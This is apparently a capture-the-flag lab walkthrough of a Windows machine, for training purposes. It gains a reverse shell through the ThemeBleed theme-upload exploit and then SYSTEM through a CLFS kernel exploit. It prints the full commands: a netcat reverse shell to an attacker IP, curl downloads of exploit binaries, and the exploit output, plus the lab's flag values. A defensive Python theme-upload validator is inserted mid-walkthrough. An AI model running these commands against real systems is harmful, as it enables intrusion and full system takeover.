Proof of Concept

10.129.229.128

Nmap

PORT   STATE SERVICE
80/tcp open  http

Initial Access

The main page of the web service on port 80 shows that the “Windows 11 theme repository” service is in use, and an email address is visible there

/etc/hosts file setup

┌──(kali㉿kali)-[~/Aero]
└─$ cat /etc/hosts
<SNIP>
10.129.229.128	aerohub.htb

Found an RCE vulnerability affecting the “Windows 11 theme repository” service

Download the PoC code

┌──(kali㉿kali)-[~/Aero]
└─$ git clone https://github.com/Jnnshschl/CVE-2023-38146.git
Cloning into 'CVE-2023-38146'...
remote: Enumerating objects: 27, done.
remote: Counting objects: 100% (27/27), done.
remote: Compressing objects: 100% (19/19), done.
remote: Total 27 (delta 10), reused 20 (delta 6), pack-reused 0 (from 0)
Receiving objects: 100% (27/27), 845.11 KiB | 4.06 MiB/s, done.
Resolving deltas: 100% (10/10), done.

Run the PoC

┌──(kali㉿kali)-[~/Aero/CVE-2023-38146]
└─$ python themebleed.py -r 10.10.14.248 -p 4711
2026-02-14 22:37:37,419 INFO> ThemeBleed CVE-2023-38146 PoC [https://github.com/Jnnshschl]
2026-02-14 22:37:37,420 INFO> Credits to -> https://github.com/gabe-k/themebleed, impacket and cabarchive
 
2026-02-14 22:37:40,112 INFO> Compiled DLL: "./tb/Aero.msstyles_vrf_evil.dll"
2026-02-14 22:37:40,114 INFO> Theme generated: "evil_theme.theme"
2026-02-14 22:37:40,115 INFO> Themepack generated: "evil_theme.themepack"
 
2026-02-14 22:37:40,115 INFO> Remember to start netcat: rlwrap -cAr nc -lvnp 4711
2026-02-14 22:37:40,116 INFO> Starting SMB server: 10.10.14.248:445
 
2026-02-14 22:37:40,118 INFO> Config file parsed
2026-02-14 22:37:40,118 INFO> Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
2026-02-14 22:37:40,119 INFO> Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
2026-02-14 22:37:40,120 INFO> Config file parsed
2026-02-14 22:37:40,120 INFO> Config file parsed

Start the nc listener

┌──(kali㉿kali)-[~/Aero]
└─$ rlwrap nc -nlvp 4711
listening on [any] 4711 ...

After that, uploading the “evil_theme.theme” or “evil_theme.themepack” file through the “Windows 11 theme repository” web page connects the reverse shell

┌──(kali㉿kali)-[~/Aero]
└─$ rlwrap nc -nlvp 4711
listening on [any] 4711 ...
connect to [10.10.14.248] from (UNKNOWN) [10.129.229.128] 62988
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
 
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
 
PS C:\Windows\system32>
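As an added example (not part of this write-up or of the ThemeBleed PoC), the following Python validator shows the check a theme-hosting service like the one on port 80 could run on every upload before storing it: it parses the INI-style .theme text and rejects any entry that points at a UNC share or a URL, which is how a ThemeBleed theme makes the client fetch its .msstyles from an attacker-controlled SMB server, and it additionally flags a [VisualStyles] Path that is not under the Windows resources directory. The two sample themes, the 203.0.113.10 address and the %SystemRoot%/%windir% allowlist are constructed assumptions; .themepack files are CAB archives that would first need to be extracted, which this example does not do.

```python
"""Upload-time validator for Windows .theme files.

Added example, not code from the original write-up or from the ThemeBleed PoC.
A .theme file is an INI-style text file; the ThemeBleed (CVE-2023-38146) chain
relies on a [VisualStyles] Path entry that points at a remote .msstyles, so a
theme-hosting service can reject such files before any client applies them.
"""
import re

# UNC paths (\\host\share\... or \\?\UNC\host\share\...) and URL schemes.
UNC_RE = re.compile(r"^(\\\\\?\\UNC\\|\\\\)[^\\]+", re.IGNORECASE)
URL_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.IGNORECASE)
# Assumed allowlist: visual styles may only be loaded from the Windows
# resources directory (the location of the stock Aero.msstyles).
LOCAL_STYLE_RE = re.compile(
    r"^%(SystemRoot|windir)%\\resources\\themes\\", re.IGNORECASE
)


def parse_theme(text):
    """Return a list of (section, key, value) tuples from INI-style theme text."""
    section = None
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue  # blank line or comment
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            continue
        if section is not None and "=" in line:
            key, _, value = line.partition("=")
            entries.append((section, key.strip(), value.strip()))
    return entries


def find_unsafe_references(text):
    """Return (section, key, value, reason) for every entry that should block the upload."""
    findings = []
    for section, key, value in parse_theme(text):
        if UNC_RE.match(value) or URL_RE.match(value):
            # Any remote reference is rejected regardless of the key: applying the
            # theme would make the client reach out to a host the attacker chooses.
            findings.append((section, key, value, "remote path"))
        elif (section.lower() == "visualstyles" and key.lower() == "path"
              and not LOCAL_STYLE_RE.match(value)):
            findings.append((section, key, value, "msstyles outside %SystemRoot%"))
    return findings


def is_safe_theme_upload(text):
    """True when the theme text contains no remote or out-of-allowlist file references."""
    return not find_unsafe_references(text)


# Constructed sample: a benign theme that only references stock Windows files.
BENIGN_THEME = """; constructed benign theme
[Theme]
DisplayName=Corporate Blue

[Control Panel\\Desktop]
Wallpaper=%SystemRoot%\\web\\wallpaper\\Windows\\img0.jpg

[VisualStyles]
Path=%SystemRoot%\\resources\\Themes\\Aero\\Aero.msstyles
ColorStyle=NormalColor
"""

# Constructed sample in the ThemeBleed pattern; 203.0.113.10 is an RFC 5737
# placeholder, not an address from the write-up.
MALICIOUS_THEME = """; constructed theme pointing at a remote msstyles
[Theme]
DisplayName=Totally Normal Theme

[VisualStyles]
Path=\\\\203.0.113.10\\themes\\Aero.msstyles
ColorStyle=NormalColor
"""

if __name__ == "__main__":
    for name, text in (("benign", BENIGN_THEME), ("malicious", MALICIOUS_THEME)):
        verdict = "accept" if is_safe_theme_upload(text) else "reject"
        print(f"{name}: {verdict}")
        for section, key, value, reason in find_unsafe_references(text):
            print(f"  [{section}] {key}={value}  ({reason})")
```

The validator deliberately treats any UNC or URL value in any section as a rejection rather than only checking [VisualStyles], because other theme keys (wallpaper, sounds, cursors) also name files the client will open; the allowlist check on Path is the narrower, ThemeBleed-specific rule layered on top.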

Read user.txt

PS C:\Users\sam.emerson\Desktop> type user.txt
type user.txt
4947c7ede773115e9b67a0736a164e53
PS C:\Users\sam.emerson\Desktop> ipconfig
ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : .htb
   IPv6 Address. . . . . . . . . . . : dead:beef::ba
   IPv6 Address. . . . . . . . . . . : dead:beef::df82:756d:5483:e6eb
   Temporary IPv6 Address. . . . . . : dead:beef::3c42:db99:5471:4d5c
   Link-local IPv6 Address . . . . . : fe80::288a:1f0b:afbf:f7b%13
   IPv4 Address. . . . . . . . . . . : 10.129.229.128
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb0:8cde%13
                                       10.129.0.1

Privilege Escalation

Two files were found in the C:\Users\sam.emerson\Documents directory

  • CVE-2023-28252_Summary.pdf
  • watchdog.ps1

PS C:\Users\sam.emerson\Documents> dir
dir
 
 
    Directory: C:\Users\sam.emerson\Documents
 
 
Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         9/21/2023   9:18 AM          14158 CVE-2023-28252_Summary.pdf
-a----         9/26/2023   1:06 PM           1113 watchdog.ps1

The contents of the PDF file confirm that the target system is vulnerable to CVE-2023-28252

CVE-2023-28252 Summary:
Vulnerability Type: Privilege Escalation
Target Component: Common Log File System (CLFS)
Risk Level: Critical
Exploitation Date: February 2022 onwards
Patch Released by Microsoft: April 2023
Background:
The Nokoyawa ransomware group has been active since February 2022, and it was only
in April 2023 that Microsoft released a patch to address this issue. This
vulnerability has been used as a means for attackers to gain unauthorized access to
Windows systems, making it imperative for us to apply the necessary patch to
safeguard our infrastructure.
According to Kaspersky’s analysis, the Nokoyawa ransomware group has used other
exploits targeting the CLFS driver since June 2022, with similar but distinct
characteristics, all linked to a single exploit developer.
Actions Required:
Immediate Patching: We strongly recommend applying the security patch released by
Microsoft for CVE-2023-28252 as soon as possible to mitigate the risk associated
with this vulnerability. Failing to do so could leave our servers exposed to
potential exploitation.
Review and Monitoring: In addition to patching, we should conduct a thorough review
of our server logs to check for any signs of suspicious activity or unauthorized
access. Continuous monitoring of our server environment is crucial to ensure the
security of our systems.
Security Awareness: It is essential to remind all team members of the importance of
practicing good cybersecurity hygiene. Encourage the use of strong, unique
passwords and two-factor authentication wherever applicable.
Incident Response Plan: Ensure that our incident response plan is up-to-date and
ready for immediate activation in case of any security incidents. Timely detection
and response are critical in mitigating the impact of potential attacks.

Download the PoC

┌──(kali㉿kali)-[~/Aero]
└─$ git clone https://github.com/bkstephen/Compiled-PoC-Binary-For-CVE-2023-28252.git
Cloning into 'Compiled-PoC-Binary-For-CVE-2023-28252'...
remote: Enumerating objects: 15, done.
remote: Counting objects: 100% (15/15), done.
remote: Compressing objects: 100% (13/13), done.
remote: Total 15 (delta 2), reused 0 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (15/15), 163.42 KiB | 8.60 MiB/s, done.
Resolving deltas: 100% (2/2), done.

Transfer the clfs_eop.exe and nc64.exe files needed for the exploit to the target

PS C:\Users\sam.emerson\Documents> curl.exe -O http://10.10.14.248:8000/clfs_eop.exe
curl.exe -O http://10.10.14.248:8000/clfs_eop.exe
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  343k  100  343k    0     0   207k      0  0:00:01  0:00:01 --:--:--  207k
 
PS C:\Users\sam.emerson\Documents> curl.exe -O http://10.10.14.248:8000/nc64.exe
curl.exe -O http://10.10.14.248:8000/nc64.exe
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 45272  100 45272    0     0  48902      0 --:--:-- --:--:-- --:--:-- 48889
 
PS C:\Users\sam.emerson\Documents> dir
dir
 
    Directory: C:\Users\sam.emerson\Documents
 
Mode                 LastWriteTime         Length Name                                                                
----                 -------------         ------ ----                                                                
-a----         2/14/2026   7:55 PM         351232 clfs_eop.exe                                                        
-a----         9/21/2023   9:18 AM          14158 CVE-2023-28252_Summary.pdf                                          
-a----         2/14/2026   7:55 PM          45272 nc64.exe                                                            
-a----         9/26/2023   1:06 PM           1113 watchdog.ps1 

Start the nc reverse shell listener

┌──(kali㉿kali)-[~/Aero]
└─$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...

Run the PoC

PS C:\Users\sam.emerson\Documents> .\clfs_eop.exe ".\nc64.exe 10.10.14.248 4444 -e cmd.exe" 1208 1
.\clfs_eop.exe ".\nc64.exe 10.10.14.248 4444 -e cmd.exe" 1208 1
 
 
ARGUMENTS
[+] TOKEN OFFSET 4b8
[+] FLAG 1
 
 
VIRTUAL ADDRESSES AND OFFSETS
[+] NtFsControlFile Address --> 00007FFD84FC4240
[+] pool NpAt VirtualAddress -->FFFFDB0CF3ED5000
[+] MY EPROCESSS FFFF800F49FDA0C0
[+] SYSTEM EPROCESSS FFFF800F44AA1040
[+] _ETHREAD ADDRESS FFFF800F48B9E080
[+] PREVIOUS MODE ADDRESS FFFF800F48B9E2B2
[+] Offset ClfsEarlierLsn --------------------------> 0000000000013220
[+] Offset ClfsMgmtDeregisterManagedClient --------------------------> 000000000002BFB0
[+] Kernel ClfsEarlierLsn --------------------------> FFFFF80525F93220
[+] Kernel ClfsMgmtDeregisterManagedClient --------------------------> FFFFF80525FABFB0
[+] Offset RtlClearBit --------------------------> 0000000000343010
[+] Offset PoFxProcessorNotification --------------------------> 00000000003DBD00
[+] Offset SeSetAccessStateGenericMapping --------------------------> 00000000009C87B0
[+] Kernel RtlClearBit --------------------------> FFFFF80527343010
[+] Kernel SeSetAccessStateGenericMapping --------------------------> FFFFF805279C87B0
 
[+] Kernel PoFxProcessorNotification --------------------------> FFFFF805273DBD00
 
 
PATHS
[+] Folder Public Path = C:\Users\Public
[+] Base log file name path= LOG:C:\Users\Public\62
[+] Base file path = C:\Users\Public\62.blf
[+] Container file name path = C:\Users\Public\.p_62
Last kernel CLFS address = FFFFDB0CF0A6F000
numero de tags CLFS founded 14
 
Last kernel CLFS address = FFFFDB0CFFBAF000
numero de tags CLFS founded 1
 
[+] Log file handle: 00000000000000F0
[+] Pool CLFS kernel address: FFFFDB0CFFBAF000
 
number of pipes created =5000
 
number of pipes created =4000
TRIGGER START
System_token_value: 4141414141414141
TRYING AGAIN
TRIGGER START
System_token_value: FFFFDB0CEE0654FA
SYSTEM TOKEN CAPTURED
Closing Handle
ACTUAL USER=SYSTEM

Reverse shell connected with administrator privileges

┌──(kali㉿kali)-[~/Aero]
└─$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.248] from (UNKNOWN) [10.129.229.128] 62993
Microsoft Windows [Version 10.0.22000.1761]
(c) Microsoft Corporation. All rights reserved.
 
C:\Users\sam.emerson\Documents>whoami
whoami
nt authority\system

Read root.txt

C:\Users\Administrator\Desktop>type root.txt
type root.txt
b654d38111468b94413805e4071e008c
 
C:\Users\Administrator\Desktop>ipconfig
ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : .htb
   IPv6 Address. . . . . . . . . . . : dead:beef::ba
   IPv6 Address. . . . . . . . . . . : dead:beef::df82:756d:5483:e6eb
   Temporary IPv6 Address. . . . . . : dead:beef::3c42:db99:5471:4d5c
   Link-local IPv6 Address . . . . . : fe80::288a:1f0b:afbf:f7b%13
   IPv4 Address. . . . . . . . . . . : 10.129.229.128
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb0:8cde%13
                                       10.129.0.1